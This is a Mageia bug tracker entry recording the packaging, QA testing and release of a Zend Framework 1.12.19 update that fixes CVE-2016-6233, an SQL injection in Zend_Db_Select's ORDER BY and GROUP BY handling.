18958 – php-ZendFramework new security issue ZF2016-02 (CVE-2016-6233)

Bug 18958 - php-ZendFramework new security issue ZF2016-02 (CVE-2016-6233)

Summary: php-ZendFramework new security issue ZF2016-02 (CVE-2016-6233)

Status:	RESOLVED FIXED

Alias:	None

Product:	Mageia
Classification:	Unclassified
Component:	Security (show other bugs)
Version:	5
Hardware:	All Linux

Priority:	Normal Severity: normal
Target Milestone:	---
Assignee:	QA Team
QA Contact:	Sec team

URL:	http://lwn.net/Vulnerabilities/696219/
Whiteboard:	has_procedure mga5-32-ok advisory
Keywords:	validated_update

Depends on:
Blocks:

Reported:	2016-07-16 12:24 CEST by David Walser
Modified:	2016-08-08 21:33 CEST (History)
CC List:	3 users (show)

See Also:
Source RPM:	php-ZendFramework-1.12.18-1.mga5.src.rpm
CVE:
Status comment:

Attachments
Add an attachment (proposed patch, testcase, etc.)

Description David Walser 2016-07-16 12:24:51 CEST

Upstream has issued an advisory on July 13:
https://framework.zend.com/security/advisory/ZF2016-02

The issue is fixed in 1.12.19.

More info is here:
http://openwall.com/lists/oss-security/2016/07/16/1

Comment 1 David Walser 2016-07-17 22:22:21 CEST

CVE-2016-6233 has been assigned:
http://openwall.com/lists/oss-security/2016/07/16/4

Summary: php-ZendFramework new security issue ZF2016-02 => php-ZendFramework new security issue ZF2016-02 (CVE-2016-6233)

Comment 2 David Walser 2016-07-20 21:14:46 CEST

1.12.19 release announcement:
https://framework.zend.com/blog/2016-07-13-ZF-1.12.19-Released.html

Note that ZF1 will be EOL in September:
https://framework.zend.com/blog/2016-06-28-zf1-eol.html

Comment 3 David Walser 2016-07-20 21:27:24 CEST

Updated package uploaded for Mageia 5.

Testing procedure:
https://bugs.mageia.org/show_bug.cgi?id=13708#c3

Advisory:
========================

Updated php-ZendFramework packages fix security vulnerability:

The implementation of ORDER BY and GROUP BY in Zend_Db_Select of ZendFramework
is vulnerable to an SQL injection (CVE-2016-6233).

References:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6233
https://framework.zend.com/security/advisory/ZF2016-02
https://framework.zend.com/blog/2016-07-13-ZF-1.12.19-Released.html
========================

Updated packages in core/updates_testing:
========================
php-ZendFramework-1.12.19-1.mga5
php-ZendFramework-demos-1.12.19-1.mga5
php-ZendFramework-tests-1.12.19-1.mga5
php-ZendFramework-extras-1.12.19-1.mga5
php-ZendFramework-Cache-Backend-Apc-1.12.19-1.mga5
php-ZendFramework-Cache-Backend-Memcached-1.12.19-1.mga5
php-ZendFramework-Captcha-1.12.19-1.mga5
php-ZendFramework-Dojo-1.12.19-1.mga5
php-ZendFramework-Feed-1.12.19-1.mga5
php-ZendFramework-Gdata-1.12.19-1.mga5
php-ZendFramework-Pdf-1.12.19-1.mga5
php-ZendFramework-Search-Lucene-1.12.19-1.mga5
php-ZendFramework-Services-1.12.19-1.mga5

from php-ZendFramework-1.12.19-1.mga5.src.rpm

Assignee: thomas => qa-bugs
Whiteboard: (none) => has_procedure

Comment 4 Brian Rockwell 2016-07-30 23:01:42 CEST

installed all of the components successfully - now working on testing listed above.

CC: (none) => brtians1

Comment 5 Brian Rockwell 2016-07-30 23:25:23 CEST

followed Claire's instructions listed in https://bugs.mageia.org/show_bug.cgi?id=13708#c3 and was able to sign the guest book

MGS5-32-ok.

Whiteboard: has_procedure => has_procedure mga5-32-ok

Dave Hodgins 2016-08-03 06:33:23 CEST

Keywords: (none) => validated_update
Whiteboard: has_procedure mga5-32-ok => has_procedure mga5-32-ok advisory
CC: (none) => davidwhodgins, sysadmin-bugs

Comment 6 Mageia Robot 2016-08-03 12:57:36 CEST

An update for this issue has been pushed to the Mageia Updates repository.

http://advisories.mageia.org/MGASA-2016-0272.html

Status: NEW => RESOLVED
Resolution: (none) => FIXED

David Walser 2016-08-08 21:33:05 CEST

URL: (none) => http://lwn.net/Vulnerabilities/696219/

Note You need to log in before you can comment on or make changes to this bug.